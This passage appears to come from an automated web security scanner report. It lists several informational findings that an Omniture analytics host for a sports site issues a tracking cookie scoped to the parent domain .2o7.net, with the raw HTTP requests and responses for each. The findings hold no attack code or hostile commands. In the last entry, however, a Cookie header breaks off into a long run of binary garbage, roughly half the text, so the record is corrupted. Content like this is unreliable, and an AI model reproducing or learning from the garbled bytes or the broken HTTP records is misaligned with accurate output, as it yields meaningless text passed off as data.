Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www277
Content-Length: 0
Content-Type: text/plain
Connection: close

16.125. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s44929469036869

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s44929469036869 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www69
Content-Length: 0
Content-Type: text/plain
Connection: close

16.126. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s45011387388221

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s45011387388221 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www262
Content-Length: 0
Content-Type: text/plain
Connection: close

16.127. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45177161318715 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s45177161318715

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820D[CE]; Expires=Tue, 3 May 2016 10:55:09 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s45177161318715 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-400001@0mJ1Iµ¯¶PqdíMìdžüvÔo€Þ??v>ûQüÊB°.-4+ÆkÁÄÑà:'idŒÖ¾‹©‹£Fmåú™ºyŠVÓÇóÃœ¤ž¼ãóÊ|éŠ£’M?½M]ZÕ˜%Þ† â!2¾ÌåúÆ¾°Å ¸a™Qýñ×Ñˆ¦ØL!'!—IbRáA·’ pu$ï ®iay7=@àg^Ÿ™ä:½ÆŠ êIÁ"{o²6v n;Ä’”tËPc"¶ÿûCŽrjâkþ.9*H»¢0 Õ»vÂeRû+g:AŠR ôçXÛZº\ÛÉ±í;áVÔŽøp8j¾i‹æWè³ÇµC£h‚ÿþöú—1Ñ‘óhp´QQ]¡ßŽà§•€OLˆÐuˆk@Â!µ( v9ÀÚî`§a{Ó@·¨Šð¸€YGÀðIHê_R „ÑÕ©M"ý¶©‡èá©ºTüù2©¤.É«$QÖ4T¸æÖ ‘’X¹Þ}Ï pkÂƒC„xéïg½;¥8ædW»Y¥AÂ†À22$`7i®áí^™ÄPr}=Nm‰•—Msd‘¤ª‰'Óq%‘eé¶¨LX$T2¸æjô_Œ5ßyqµøQÆõ†îÌ‹åXNzî %.MŠð@xw(ƒª›# Œ”’¢^ŸZü¼JÏiAmmQ!YÃè°":õ v7»X,y6ëáêWƒ â^P-^Íû´s›ÿù«éâ;ôU»08>eK'âZ Úí›“ÒÏz?è´“ºTx*ê$z ?ù\%qrd–ZïR!Yÿ\B¬ÆÖ1/fu:·W?ýÔHoû®à J·Ÿ½Æ²wìÃ«œƒÂ„1O@`¹¯Þ%X²þHs&t—Ì«…»W˜ Rß¶- m Î¨gx¼õ?Ï_ÿ?¢MìIÚacÃ|Š03É2ÿ7ëœ%mN)4Â´ùôóA®òîÉ\¤ ‰Â}*î:?u¿qÀ(Ú c¯–Û§³"†¾”ux¬ÃzqQ‘ÔJ‡îýJþ¯çQ°ùW¦J™à[s:óÃSúzñ|yJY/™Î&0“ÔçF}}é8Ùq<7Ìn¯±ó°“SÀL€›¹¿Ž9-ó‚rx¿õÅVPAlÌ“èšS(KKì¸–²¡t6#ŽÕºUÕWp©ÿíÖ…„xBá§¥+õ.Ç ZÔL±šØ~£ËËFÎOé#Ç³h¶ù£báoKPn·¿Š†Yd°‚Pu,8‡g²ËªëÒ¼¤ˆ‹z||ÒzÀ$g´7Ë2_bƒà¡-ƒ×¢ÓVAÝlrï•4f²oj#—E/ýc‰Jös!¹RL8w…Âwº°g¤f—~¤î^4¶Õý»lÈ±ã»yð¿eú—à/†flðºno«_Ð´xÕ ›s1î‡k€h{6À¡óÁÛöân?Ð4aš ô¹–M=•,€ídº ÖÎ ûË?_vÎaÑœYLAªÜ–Íeú±kþY‡¸YÒ>†ùh|~MlRÎú®su±.éý ëëB?ùÆÿL½ 5Ð·hìü*Z“zrçïÿ®Í ¥0ECaÆÒ®ÈI3XYçÙEó.b}ýí¢,öHÆ‚<÷Åq±&Döõ¶kœÔ„+Ož1HìôòÌJ@c¬k**áÜ$D^ãyëµ%ÛQ³Vk¼ü‰)üpl;‰ÜÝrIOiÓS2Î=~ 5v5_¾2ú’ ®šI±Tôr?‰N|6ûXŸ‰ jæú‡ÊQeÒèQ=ŒÁzÿ¸íS¡1wÚDGmä‰|Ç§,Ý+\bDÍ›#.ŠMBÐnÙA…sðIÈœUºtñ{›H50‘[yPp1¾?˜i6 ø6Ûa-4ÏîQ \ìl+Ÿ~êÒóª‹Ô ×ÃÑj0ˆS²ˆ‚Š¤Ÿ ¿=t»¿ÄæEuÃŠ‚™í–¸¾a Í °¡¾#ˆC¿YˆÝà&+i=µdKòî¡7²LP¦4®4„`j† /Óµ›\Bß(ÆN!Ñ [©²)ùÈ.Pûwþ}&$}Á1½p˜:úÌú¡`®gp²;êJF’ùÜÅé¢q'íŽ—AŸùw ¡F;™•8LTjD^$Þ„—Ínó.cÔvyKsOÎ…§E!;«5H¼s‘îä–æƒºÜo`ÛviXê ×éÃló¿€—‡8ÔÝ`+Ùêná…š¬ÏjáPUm0ŒÙ p*¤†¸@{€Ôt“ìV4Ñ.¤Æá!¥6\6K%9·Q0;^®ó&F¢¨s–QB¥Æè¶õmAÛ÷˜¨Oy+Ž(—0 ˜ÎM|RYFº]nÝ/5ajÐÂÀ‰ÏhP]ò^.åÚJÝt¤I1Ùq¯ªöªRª´'‘Ý&LXq)òm…±DÔÞŽï:3…®•ø;O´˜4ÈyyEá÷àØOÇXä„¤¬?G$èrSå0*ËiÐØKÇIêv7™³Vñœ=ÇÂ>YÅiü€®Ë éò4³Œæ2^¾›ÝÖú6¢>0Q`Œ‡$Ät\óŽ§ÙxjŸ§Zùpe0~Ú Z£®îê X/\u8ð÷ÐÙBKFÑ+ôïÓIFò„bà´ÉpÀªÑEqmlÈØI”Ø’j\`jè®ôRˆ*~ˆ.ª+}cm¿eÛðZDO}ÊZË¡ižJo>µúîQªºQÅSOÄî½8d…^¸@ 99%¥R–ƒš$†æŒ¦HÝ¨˜Ë^GEû ðþ%óHî¿W›ÉÍåÞE®íL‚@ð¨”:’¥A}ðºšùWBäÃ"‚`ÆAÛíúÄÄƒ{äRqê×Þ¾ÍÔ”ãiþä=÷?1%jõ˜JÍž&»MÒ}h–HØk¤4O>RE7IëÈ3¡–®Õ¥š¼ÕòÈxyè#ç®ÖÕÄ¯Ö ¨oÑQ˜‰äh©®(.öKÄ@Ô?Àó¸ù„CPÙÈ]"”à/A×BzP;G@—kÅûß*®;‘§@î˜X|îûå·!=ŠÇ…%‰¹qfÉhv8(·;C&xâÛCgÇ€½ƒm‘éT¾…’Îƒ|#â ã"åª"ùt}¾¢¼÷ÏFû±/o‚¶N…ä3\u’+spë0@Z ½ä&9Ü%÷ðÉªuì,CiêoÚ~5!ßºÀííÑy„´Îßm1ì,£Äb„z²© 6UD‚ò?Õ«Uº‚íi}ytîŸäˆÚÁnÇv,ç?á_‡„3«ÿÍò›køÖ¤è…¢¶J #×‚s #Ívä$XZ ô?ÖÙ¦ß™ôOÑÂGƒØø¿ O¼>ÍyÂmC÷]tMR»À»®ÐÖdžžm¿Ðh%qh pà þ«ÀUy+ªËPW¶KìtuúïË?py‹î(Éª;4ÇŠË·cøh¸<WihfO“P‹›Ì²3Ù%»*$¿°3Änù¸ÊÓ¼~TRïQ•x):p½²®s¹ñô©ètO °™Nz¦r[0f¿‚v^Êò ¡¾¯ÈTM3Ö2ù¹¡¢14ôÅ¹ê©´.ù?[ºö¿Ñ‹ÿÃÊPY”ðïÅTÊ³¯+ô€÷Í)œN@²hUÍ ×ðL!½[WSÜ8Íõ$™IŽáqâùe†Òè¿Í/‰îºÀ[{pŠéùívhq0€ ›xØš¾WR®ad+jå3]hûV ²Ö¬® ü„zJ…„Aú{‚“9Œd¥+”p—úèÎ_Þž ÷/Å´ý‘7•ØyñóÛ%—nêù¦`›.! º€…ç[¼Zœ¢8Ö[O,ïPÜê=ÉË"ÏFaøÙ<¶Tdœêi—æWny3’×ë:¤¾{ë^†5(B%=ža¨OÁ|‹ü_!òÑû7›®¤žH›“kipr. ‹d5b!UsZNŠ«× üÛøÙ¦³Ÿ¥ïÌîì_›Ž•ð©Í£ÛÝÒHáCâ[ Üß 3†;{ù’n†Œ³)ëá¡ªq¸iÅõ]NsÿyÆîégæD1@*ÍV’Í…òÀT?s»ÙIªîLÂÆ4bŒÂr¹æ>Ãüî‚Ãt™FÇ^N™:õ´¬.UVX¡HÈ£æÌC¹és‚FcÕíŒJžÓýÂñÜÏkÄÚgÝ2©¯8ðVì,ÆL•¨!{%tñò•C³RBIó>…ªˆ»¿§z*u´šmD2®ø©D[å¿ª¡öêF?Î1([ÄvÓÆC‘~HÉ˜ëìÒ_[·<“:ÈÆw¿ Õåè€ÈLï‹€ìçà{ö8Ýø×çS– 0ú¢óAÂðA7aäw7ˆöH :ÙŸuHºÿxjÕ”èt€®EBrþóÍ´Žc/^¼Ë…ªcGk¾\.B~Éóî6k;zÓèã˜òu©)¨ÁÇÊÚÁ¼sÐòW:š·pžÞÕ$Ö¶¦ÞªŽñar yô|0¤Ë^oÔWúÕ_ù-)¾ jèÖ‰ ˜•VYfŽínM…Ehk¾…<±3@kH/'¦â%º«s]‹wÈkÊ‘Ä·0Òýš†Å²ê¡&@ ^aØ¢Àk®!Ø×)]}ßÔ‘zæ=f_WÁ8*@GœÖì1´)[®¹–ªÔh·¾Ñu‹zóAKà>.{1éí;)8M¼Êz±&/çŸ…jßY8-†m•xŒ?šZéiÏÛ2d¡OnÞ‡*àÀúÀHEˆ+”Í…ƒºÔ|×iEõ.4M]Ÿ l?Î¤žæÀpžÉdQ¹ï–,áAÈVBèËéþp±V.c&B’ÂR,ÍJ;ê¡ÿ_ù ULÐêÊ˜ì˜æ½"ê%N¢ÝÚqÞ:©+.¤QŒS|º1œkÛþr-(F¢sHÓ¢3>Í°y\—tWjÁ÷çÖøþî˜ì¿ Í¨ŽGÔþØ\Æ#žB0‚ÕöÎ»‘JØõ;}ósÀ¾°<Ôš‹“ZÄ‚Ž0ÒYã÷&¯³OŽ3°@qX•µ¡òs-÷©5ô[Ž$¡½ß‚ ß2Ïœ¨Ì_]ÜDËñ8)üJ>ØÐ ƒ·˜j‹Ûké9[¨ñì<›éðž:â‚HT¡ü¯o÷€âFŽ(š¥ÎUcW¡ùo3ß¯½@-Å'BÙ–à×'pñ½€YPÜrHdso}‚±Å;·µ`~BSDb/À¡%äm•ýM¯ /éè‚¢,eå Z¨h÷X#EM!ÉPÒhèÿ…«Ä=žÏì+ŽúÚI‡c‘Cá2â¡€¾¢û»±BÞ#UuViwØ}¹$øô/ µ“’7ËF’ÇšÔG6¯BL7ÞÛj7åŸñ ŽÆÔq(09Ò‚üX&)í¸æ*ì w—Ëpó–8“^]ž8=•J¡ê‚Nd†Ä¢Ä ëõRD Ó@ó5-L(a×?…ñô‰íÃˆúúH²g¹‰l·E0ðoçí„FRSäHºÍhÃ²Tá6,UÏb‰·T§i¥J5N2!àËÈ"Ž±[|¼‰iFM“àŽuõuïX<$h‰Ä¼ðpUó{>ÚâÑ2A”ïæYTäNÄÀ°v{Ý_šé£ë)EÔðn’;üÍ9_{¤€6e“dSXËº,ÿ#ë¥yŽq°ÚËn+Z‹_·½4|—5J*-JŒyüçô1¤«þ]˜È„vsùgw(lªûxü£¨¼Š\+{sh÷r7‡Æà³Î[§ãÈ.AhvïÁ6‚×¸:í-{©Xã~Pg¬›P{›‹³Pä±¢“°n1þA@é“Ôg0AÎP"LöÈ¤Îëö÷Ä<÷*årÀŠ]SX¥£ÂÿÇ:K×Rí.?]0=¹¨Z_¸¬âÚƒ€ ´§Ûe¦†aŠv}«fèÞfMDAYfMòÌ.Ñ€îÚ„¡M«„ä£(.3¡g+2ã0©4ÌEÚ'Ñx Ytdˆ³Uá5Ð–e*eÚç%ž/#d¼È|aÖ¡‹óSÉâ)âzÉSt&§0—•ÁjæŠ‚„«1s üQ{™@h¥‰³‘ý>«PôÎ[Èî§iØ¶ðMUÏ4ýç\qØ]pY•Ó²¸¹³qÿ«çŽºm±˜€2-à ¢Épÿ)}J¤[ §—Ó*x°CAØ'ð+–’3WÏ€-IúÅ9þÁ™;-ç¿çdhÆGìà¬ ªZ¹(KSó… :CÙ3ØiK¾bA!ö1]ˆš>QbÝçµ¥ëÍuo2ÿBt½«ê1ß£ÄïO˜á—¼x/ªÐû2qDžm¾“‡èºøÐM¸h{õÝ_r“Î4mÑ(3p[¢D—ÔÍËÌ‡X”N™Pþ¯#µ¶idà'¯ë›Í;lçg.ÂÐå–éûÖþ-õ¸ðH?/þ•»Š•bzjûA4fy/Jq«Ð±·qm©Ûîlg)}Y I§€øó—pPË÷Þvà³âªÏ.wµõ…ÎŽ¸y¼`¨†¬ƒ‡ éNã¥ù‚4¢s€É’”+ý…èüêÇµØ¯Ò ØœC¡®ðí(à9ÚßˆK9‘Š©ÁbÚEË!-2ØÖˆ¯™ƒ*O3öÞ~ôœfÒøî£ÇE!9+Z]¦ä[¾œÌ:ÇÜãU•'œ8®«wnh$ãšEp.ÏG-ð®W·U`’((ÀµEv‘yýŽ}F·Ü¡íîº— Iæn‘jÊ%oŽ ˜Âl2©Î)Ær`ÛÔ½?Ý%ãwA¥š-7·3²XßvîæÇŒT’£ËThq É$Dßåª¿¤Æ‡_f›MçMzÜñü·~î±âé\ÑAù3¾†?˜`ª®µ÷ƒñé‚‘²†VÍE!€özâæšÃN®YY ˜ûŽn+L7Òk ‚øí65Ç¢øaFX]c7R .h†“ÀV·Ç½ñgùËœ;{3ÐílÂ ¬í³hýLÚ/dæ½ö7‰?âØƒîâ’Løýò¹ƒÀCG¾ @¤ðn¯¥X)ÆiúÙÿ_Ž`ó@ú{ôð…”4b±\m–›;¢ò÷2RE˜cä}ü/Ÿ–‰¦ Ö½h–]¹'†·¹½øß À{õÊð1Õç2‰FÂ¡ú¼N¾~lýÖmô~ÕŠ<¿ÊxX¹É³È\çœ3CÉ;ïéíIé7š—Ó«²üi†Y·+UÚÄ}ÖI¡©ÄÚT’¢6™Ç×É#åUÉ©p¼!h¾}ÉÃqÃ©$qÁ`ÌT|»-À"“ýKuŒep:5»|²Y„ÙÐ‡saˆ²‘¾ž”ê ×ˆ"º°M n,!éwÕ1ô}/Ñ]™ŽÃ §Êz—áÇ+'eçó,µ…û°bÃƒáÄÁÈ”Öï«\BMwx×Ç}%ËƒÃm9Lu>AA½›™n´h""éN%9¡X•« QNþº·ôThf"M8]Ê…µ‡ `*Ôáœ~úý{Ë¶¶˜Q"uXƒ}-Tt4Öh´?sóIÑðë1ß[•¾\ÔF^œÚ_i6.àÓ¦Œ}ó»Ù²eÊb¡b…¥jhÝ‚€-ÌRœ)åÏí‹äÌGê…º‹– Š}Xæ§‚½XáÝCOôE‹Q)òuÁzÿ¡n3R‚˜g¾ŠAe±0Cò³@ôJ^CL‚Èçvœ’ìS5•ÐsŒ¬ÐÊ¾”D o±8Úú$»”«×Œ³!í7²J?ŒÌçîMWð2ÜQ&ÙÍôåšÛ¡°#·ÒQ^Ók?îVºP~N%nË¾Ÿ"ÞÌ ›Moˆ}¶Ûh zÆP?;˜‡XYd¸ž´Íú†çÕuöËô¾éíFûè#VÌjêX ;¦:çxKE÷!S¥#rFv^ðÊ=§'}áUIÄëouHH'úJ‘n˜ö°°€°Dž´Â`Øµqy5hY£Ç<ÿÑíÇæ~+ñûßˆÊO2Rµ™‘Ò MŒù«XË‡hThèœený°MÆ0éÛ'Š]NÌ‘IÈL,±š#½è¡>Ÿ`«žútjãõé«”ÄBù¢œP¶jF*-E„GI@²ˆÇÒ†hÇ ïPàÇzùp~Š*ÚOø¶É·24@BXÆD¨äkÝxk?øo”{è¼–oâpO·VTyžp‰gÇœ‘S=w@T«s£\J¦ žÕiòÙ9iÍ/ù£ƒVš+¹Äâæêï’‹™&ue}PRÏ¸¤‰‘"‘8þ³—-%ˆaNvØ>g®ê‰5ñÅõÈ.=r©÷ï™HÔ“¾4EAîÎmï³i‰sœdŽöŸ´£”ËåwŽ:1Ùê¿îj~½&¤¬ç&\áê#±Bz[‘n]…KˆXÂê‰€q© ²Ë¡²—yÚè°äÚ*ˆïvw>a):4›÷Ôm¾¹Ö¾Hºá¦í*[o>t‚/*37Ç–QØ%ØQ¶`”Ý¨= ì0‡Çƒ×#ÖIZˆìÉ˜žH¥ŒÙòWz?Ùº‰‡Ð¯ÊK˜¶! ·ÄGß±Ë˜fÆiAEÞ5–ÐïqGslýžµÙ\§l*;~5pñfzñsžÑo/ÌªùKMG½6{œøuØ¡˜—^#Äµp¤¬œÞë…Èž‹%°XàÇKÌ¹Þ‡²øÀlŠä™—RbUœÄÓÁ²†Uy³ð[_œsrëÛÆáçŽÇ¯+MÅöÃ"A€Œ0òÛbÊRÉŠLLÆ-À<Â&š“ÕµêI8